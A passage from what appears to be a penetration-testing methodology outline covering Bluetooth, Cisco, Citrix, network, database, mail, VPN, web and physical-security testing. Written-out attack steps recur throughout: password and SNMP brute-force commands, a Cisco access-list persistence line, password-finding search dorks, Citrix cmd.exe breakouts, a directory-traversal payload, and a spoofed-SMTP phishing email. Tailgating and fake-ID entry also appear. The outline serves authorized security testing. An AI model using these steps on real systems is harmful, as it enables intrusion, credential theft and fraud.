21.2.1.1.1. Untitled
21.2.1.2. Untitled
21.2.1.2.1. Untitled
21.2.1.3. Untitled
21.2.1.3.1. Untitled
21.2.1.4. Untitled
21.2.1.4.1. Recommended value is 30
21.2.2. Password Policy
21.2.2.1. Untitled
21.2.2.1.1. Untitled
21.2.2.2. Untitled
21.2.2.2.1. Untitled
21.2.2.3. Untitled
21.2.2.3.1. Untitled
21.2.2.4. Untitled
21.2.2.4.1. Untitled
21.2.2.5. Untitled
21.2.3. Audit level
21.2.3.1. Untitled
21.2.3.1.1. Recommended value is *SECURITY
21.2.4. Documentation
21.2.4.1. Users class
21.2.4.1.1. Untitled
21.2.4.2. System Audit Settings
21.2.4.2.1. Untitled
21.2.4.3. Special Authorities Definitions
21.2.4.3.1. Untitled
22. Bluetooth Specific Testing
22.1. Bluescanner
22.2. Bluesweep
22.3. btscanner
22.4. Redfang
22.5. Blueprint
22.6. Bluesnarfer
22.7. Bluebugger
22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
22.8. Blueserial
22.9. Bloover
22.10. Bluesniff
22.11. Exploit Frameworks
22.11.1. BlueMaho
22.11.1.1. Untitled
22.12. Resources
22.12.1. URL's
22.12.1.1. BlueStumbler.org
22.12.1.2. Bluejackq.com
22.12.1.3. Bluejacking.com
22.12.1.4. Bluejackers
22.12.1.5. bluetooth-pentest
22.12.1.6. ibluejackedyou.com
22.12.1.7. Trifinite
22.12.2. Vulnerability Information
22.12.2.1. Common Vulnerabilities and Exploits (CVE)
22.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
22.12.3. White Papers
22.12.3.1. Bluesnarfing
23. Cisco Specific Testing
23.1. Methodology
23.1.1. Scan & Fingerprint.
23.1.1.1. Untitled
23.1.1.2. Untitled
23.1.1.3. If SNMP is active, then community string guessing should be performed.
23.1.2. Credentials Guessing.
23.1.2.1. Untitled
23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
23.1.3. Connect
23.1.3.1. Untitled
23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
23.1.4. Check for bugs
23.1.4.1. Untitled
23.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
23.1.5. Further your attack
23.1.5.1. Untitled
23.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
23.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
23.1.5.2. Untitled
23.1.5.2.1. #> access-list 100 permit ip <IP> any
23.2. Scan & Fingerprint.
23.2.1. Port Scanning
23.2.1.1. nmap
23.2.1.1.1. Untitled
23.2.1.2. Other tools
23.2.1.2.1. Untitled
23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
23.2.2. Fingerprinting
23.2.2.1. Untitled
23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
23.2.2.2. Untitled
23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
23.2.2.2.2. Untitled
23.3. Password Guessing.
23.3.1. Untitled
23.3.1.1. ./CAT -h <IP> -a password.wordlist
23.3.1.2. Untitled
23.3.2. Untitled
23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
23.3.2.2. Untitled
23.3.3. Untitled
23.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
23.3.3.2. Untitled
23.4. SNMP Attacks.
23.4.1. Untitled
23.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
23.4.1.2. Untitled
23.4.2. Untitled
23.4.2.1. onesixytone -c SNMP.wordlist <IP>
23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
23.4.3. Untitled
23.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
23.4.3.2. Untitled
23.5. Connecting.
23.5.1. Telnet
23.5.1.1. Untitled
23.5.1.1.1. telnet <IP>
23.5.1.1.2. Sample Banners
23.5.2. SSH
23.5.3. Web Browser
23.5.3.1. Untitled
23.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
23.5.4. TFTP
23.5.4.1. Untitled
23.5.4.1.1. Untitled
23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
23.5.4.2. Untitled
23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
23.5.4.2.3. Creating backdoors in Cisco IOS using TCL
23.6. Known Bugs.
23.6.1. Attack Tools
23.6.1.1. Untitled
23.6.1.1.1. Untitled
23.6.1.2. Untitled
23.6.1.2.1. Web browse to the Cisco device: http://<IP>
23.6.1.2.2. Untitled
23.6.1.2.3. Untitled
23.6.1.2.4. Untitled
23.6.1.3. Untitled
23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
23.6.2. Common Vulnerabilities and Exploits (CVE) Information
23.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
23.7. Configuration Files.
23.7.1. Untitled
23.7.1.1. Configuration files explained
23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
23.7.1.1.2. Untitled
23.7.1.1.3. Untitled
23.7.1.1.4. Password Encryption Utilised
23.7.1.1.5. Untitled
23.7.1.2. Configuration Testing Tools
23.7.1.2.1. Nipper
23.7.1.2.2. fwauto (Beta)
23.8. References.
23.8.1. Cisco IOS Exploitation Techniques
24. Citrix Specific Testing
24.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
24.2. Enumeration
24.2.1. web search
24.2.1.1. Google (GHDB)
24.2.1.1.1. ext:ica
24.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
24.2.1.1.3. [WFClient] Password= filetype:ica
24.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
24.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
24.2.1.1.6. inurl:/Citrix/Nfuse17/
24.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
24.2.1.2. Google Hacks (Author Discovered)
24.2.1.2.1. filetype:ica Username=
24.2.1.2.2. inurl:/Citrix/AccessPlatform/
24.2.1.2.3. inurl:LogonAgent/Login.asp
24.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
24.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
24.2.1.2.6. inurl:/Citrix/NFuse16
24.2.1.2.7. inurl:/Citrix/NFuse151/
24.2.1.2.8. allintitle:MetaFrame XP Login
24.2.1.2.9. allintitle:MetaFrame Presentation Server Login
24.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
24.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
24.2.1.3. Yahoo
24.2.1.3.1. originurlextension:ica
24.2.2. site search
24.2.2.1. Manual
24.2.2.1.1. review web page for useful information
24.2.2.1.2. review source for web page
24.2.3. generic
24.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
24.2.3.2. amap -bqv ip_address port_no.
24.2.4. citrix specific
24.2.4.1. enum.pl
24.2.4.1.1. perl enum.pl ip_address
24.2.4.2. enum.js
24.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
24.2.4.3. connect.js
24.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
24.2.4.4. Citrix-pa-scan
24.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
24.2.4.5. pabrute.c
24.2.4.5.1. ./pabrute pubapp list app_list ip_address
24.2.5. Default Ports
24.2.5.1. TCP
24.2.5.1.1. Citrix XML Service
24.2.5.1.2. Advanced Management Console
24.2.5.1.3. Citrix SSL Relay
24.2.5.1.4. ICA sessions
24.2.5.1.5. Server to server
24.2.5.1.6. Management Console to server
24.2.5.1.7. Session Reliability (Auto-reconnect)
24.2.5.1.8. License Management Console
24.2.5.1.9. License server
24.2.5.2. UDP
24.2.5.2.1. Clients to ICA browser service
24.2.5.2.2. Server-to-server
24.2.6. nmap nse scripts
24.2.6.1. citrix-enum-apps
24.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
24.2.6.2. citrix-enum-apps-xml
24.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
24.2.6.3. citrix-enum-servers
24.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
24.2.6.4. citrix-enum-servers-xml
24.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
24.2.6.5. citrix-brute-xml
24.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
24.3. Scanning
24.3.1. Nessus
24.3.1.1. Plugins
24.3.1.1.1. CGI abuses
24.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
24.3.1.1.3. Misc.
24.3.1.1.4. Service Detection
24.3.1.1.5. Web Servers
24.3.1.1.6. Windows
24.3.2. Nikto
24.3.2.1. perl nikto.pl -host ip_address -port port_no.
24.3.2.1.1. Untitled
24.4. Exploitation
24.4.1. Alter default .ica files
24.4.1.1. InitialProgram=cmd.exe
24.4.1.2. InitialProgram=explorer.exe
24.4.2. Enumerate and Connect
24.4.2.1. For applications identified by Citrix-pa-scan
24.4.2.1.1. Pas
24.4.2.2. For published applications with a Citrix client when the master browser is non-public.
24.4.2.2.1. Citrix-pa-proxy
24.5. Brute Force
24.5.1. bforce.js
24.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
24.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
24.5.1.3. Untitled
24.6. Review Configuration Files
24.6.1. Application server configuration file
24.6.1.1. appsrv.ini
24.6.1.1.1. Location
24.6.1.1.2. World writeable
24.6.1.1.3. Review other files
24.6.1.1.4. Sample file
24.6.2. Program Neighborhood configuration file
24.6.2.1. pn.ini
24.6.2.1.1. Location
24.6.2.1.2. Review other files
24.6.2.1.3. Sample file
24.6.3. Citrix ICA client configuration file
24.6.3.1. wfclient.ini
24.6.3.1.1. Location
24.7. References
24.7.1. Vulnerabilities
24.7.1.1. Art of Hacking
24.7.1.2. Common Vulnerabilities and Exploits (CVE)
24.7.1.2.1. Sample file
24.7.1.2.2. Untitled
24.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
24.7.1.3. OSVDB
24.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
24.7.1.4. Secunia
24.7.1.5. Security-database.com
24.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
24.7.1.6. SecurityFocus
24.7.2. Support
24.7.2.1. Citrix
24.7.2.1.1. Knowledge Base
24.7.2.2. Thinworld
24.7.3. Exploits
24.7.3.1. Milw0rm
24.7.3.1.1. http://www.milw0rm.com/search.php
24.7.3.2. Art of Hacking
24.7.3.2.1. Citrix
24.7.4. Tools Resource
24.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
25. Network Backbone
25.1. Generic Toolset
25.1.1. Wireshark (Formerly Ethereal)
25.1.1.1. Passive Sniffing
25.1.1.1.1. Usernames/Passwords
25.1.1.1.2. Email
25.1.1.1.3. FTP
25.1.1.1.4. HTTP
25.1.1.1.5. HTTPS
25.1.1.1.6. RDP
25.1.1.1.7. VOIP
25.1.1.1.8. Other
25.1.1.2. Filters
25.1.1.2.1. ip.src == ip_address
25.1.1.2.2. ip.dst == ip_address
25.1.1.2.3. tcp.dstport == port_no.
25.1.1.2.4. ! ip.addr == ip_address
25.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
25.1.2. Cain & Abel
25.1.2.1. Active Sniffing
25.1.2.1.1. ARP Cache Poisoning
25.1.2.1.2. DNS Poisoning
25.1.2.1.3. Routing Protocols
25.1.3. Cisco-Torch
25.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
25.1.4. NTP-Fingerprint
25.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
25.1.5. Yersinia
25.1.6. p0f
25.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
25.1.7. Manual Check (Credentials required)
25.1.8. MAC Spoofing
25.1.8.1. mac address changer for windows
25.1.8.2. macchanger
25.1.8.2.1. Random Mac Address:- macchanger -r eth0
25.1.8.3. madmacs
25.1.8.4. smac
25.1.8.5. TMAC
26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
26.1. Password Attacks
26.1.1. Known Accounts
26.1.1.1. Identified Passwords
26.1.1.2. Unidentified Hashes
26.1.2. Default Accounts
26.1.2.1. Identified Passwords
26.1.2.2. Unidentified Hashes
26.2. Exploits
26.2.1. Successful Exploits
26.2.1.1. Accounts
26.2.1.1.1. Passwords
26.2.1.1.2. Groups
26.2.1.1.3. Other Details
26.2.1.2. Services
26.2.1.3. Backdoor
26.2.1.4. Connectivity
26.2.2. Unsuccessful Exploits
26.2.3. Resources
26.2.3.1. Securiteam
26.2.3.1.1. Exploits are sorted by year and must be downloaded individually
26.2.3.2. SecurityForest
26.2.3.2.1. Updated via CVS after initial install
26.2.3.3. GovernmentSecurity
26.2.3.3.1. Need to create and account to obtain access
26.2.3.4. Red Base Security
26.2.3.4.1. Oracle Exploit site only
26.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
26.2.3.5.1. Wireless Exploit Site
26.2.3.6. PacketStorm Security
26.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
26.2.3.7. SecWatch
26.2.3.7.1. Exploits sorted by year and month, download seperately
26.2.3.8. SecurityFocus
26.2.3.8.1. Exploits must be downloaded individually
26.2.3.9. Metasploit
26.2.3.9.1. Install and regualrly update via svn
26.2.3.10. Milw0rm
26.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
26.3. Tools
26.3.1. Metasploit
26.3.1.1. Free Extra Modules
26.3.1.1.1. local copy
26.3.2. Manual SQL Injection
26.3.2.1. Understanding SQL Injection
26.3.2.2. SQL Injection walkthrough
26.3.2.3. SQL Injection by example
26.3.2.4. Blind SQL Injection
26.3.2.5. Advanced SQL Injection in SQL Server
26.3.2.6. More Advanced SQL Injection
26.3.2.7. Advanced SQL Injection in Oracle databases
26.3.2.8. SQL Cheatsheets
26.3.2.8.1. Untitled
26.3.3. SQL Power Injector
26.3.4. SecurityForest
26.3.5. SPI Dynamics WebInspect
26.3.6. Core Impact
26.3.7. Cisco Global Exploiter
26.3.8. PIXDos
26.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
26.3.9. CANVAS
26.3.10. Inguma
27. Server Specific Tests
27.1. Databases
27.1.1. Direct Access Interrogation
27.1.1.1. MS SQL Server
27.1.1.1.1. Ports
27.1.1.1.2. Version
27.1.1.1.3. osql
27.1.1.2. Oracle
27.1.1.2.1. Ports
27.1.1.2.2. TNS Listener
27.1.1.2.3. SQL Plus
27.1.1.2.4. Default Account/Passwords
27.1.1.2.5. Default SID's
27.1.1.3. MySQL
27.1.1.3.1. Ports
27.1.1.3.2. Version
27.1.1.3.3. Users/Passwords
27.1.1.4. DB2
27.1.1.5. Informix
27.1.1.6. Sybase
27.1.1.7. Other
27.1.2. Scans
27.1.2.1. Default Ports
27.1.2.2. Non-Default Ports
27.1.2.3. Instance Names
27.1.2.4. Versions
27.1.3. Password Attacks
27.1.3.1. Sniffed Passwords
27.1.3.1.1. Cracked Passwords
27.1.3.1.2. Hashes
27.1.3.2. Direct Access Guesses
27.1.4. Vulnerability Assessment
27.1.4.1. Automated
27.1.4.1.1. Reports
27.1.4.1.2. Vulnerabilities
27.1.4.2. Manual
27.1.4.2.1. Patch Levels
27.1.4.2.2. Confirmed Vulnerabilities
27.2. Mail
27.2.1. Scans
27.2.2. Fingerprint
27.2.2.1. Manual
27.2.2.2. Automated
27.2.3. Spoofable
27.2.3.1. Telnet spoof
27.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].
27.2.4. Relays
27.3. VPN
27.3.1. Scanning
27.3.1.1. 500 UDP IPSEC
27.3.1.2. 1723 TCP PPTP
27.3.1.3. 443 TCP/SSL
27.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
27.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
27.3.2. Fingerprinting
27.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
27.3.3. PSK Crack
27.3.3.1. ikeprobe 80.75.68.27
27.3.3.2. sniff for responses with C&A or ikecrack
27.4. Web
27.4.1. Vulnerability Assessment
27.4.1.1. Automated
27.4.1.1.1. Reports
27.4.1.1.2. Vulnerabilities
27.4.1.2. Manual
27.4.1.2.1. Patch Levels
27.4.1.2.2. Confirmed Vulnerabilities
27.4.2. Permissions
27.4.2.1. PUT /test.txt HTTP/1.0
27.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
27.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
27.4.3. Scans
27.4.4. Fingerprinting
27.4.4.1. Other
27.4.4.2. HTTP
27.4.4.2.1. Commands
27.4.4.2.2. Modules
27.4.4.2.3. File Extensions
27.4.4.3. HTTPS
27.4.4.3.1. Commands
27.4.4.3.2. Commands
27.4.4.3.3. File Extensions
27.4.5. Directory Traversal
27.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
28. Physical Security
28.1. Building Security
28.1.1. Meeting Rooms
28.1.1.1. Check for active network jacks.
28.1.1.2. Check for any information in room.
28.1.2. Lobby
28.1.2.1. Check for active network jacks.
28.1.2.2. Does receptionist/guard leave lobby?
28.1.2.3. Accessbile printers? Print test page.
28.1.2.4. Obtain phone/personnel listing.
28.1.3. Communal Areas
28.1.3.1. Check for active network jacks.
28.1.3.2. Check for any information in room.
28.1.3.3. Listen for employee conversations.
28.1.4. Room Security
28.1.4.1. Resistance of lock to picking.
28.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
28.1.4.2. Ceiling access areas.
28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
28.1.5. Windows
28.1.5.1. Check windows/doors for visible intruderalarm sensors.
28.1.5.2. Check visible areas for sensitive information.
28.1.5.3. Can you video users logging on?
28.2. Perimeter Security
28.2.1. Fence Security
28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
28.2.2. Exterior Doors
28.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
28.2.3. Guards
28.2.3.1. Patrol Routines
28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
28.2.3.2. Communications
28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
28.3. Entry Points
28.3.1. Guarded Doors
28.3.1.1. Piggybacking
28.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
28.3.1.2. Fake ID
28.3.1.2.1. Attempt to use fake ID to gain access.
28.3.1.3. Access Methods
28.3.1.3.1. Test 'out of hours' entry methods
28.3.2. Unguarded Doors
28.3.2.1. Identify all unguardedentry points.
28.3.2.1.1. Are doors secured?
28.3.2.1.2. Check locks for resistance to lock picking.
28.3.3. Windows
28.3.3.1. Check windows/doors for visible intruderalarm sensors.
28.3.3.1.1. Attempt to bypass sensors.
28.4. Office Waste
28.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
29. Final Report - template
30. Contributors
30.1. Matt Byrne (WirelessDefence.org)
30.1.1. Matt contributed the majority of the Wireless section.
30.2. Arvind Doraiswamy (Paladion.net)
30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
30.3. Lee Lawson (Dns.co.uk)
30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.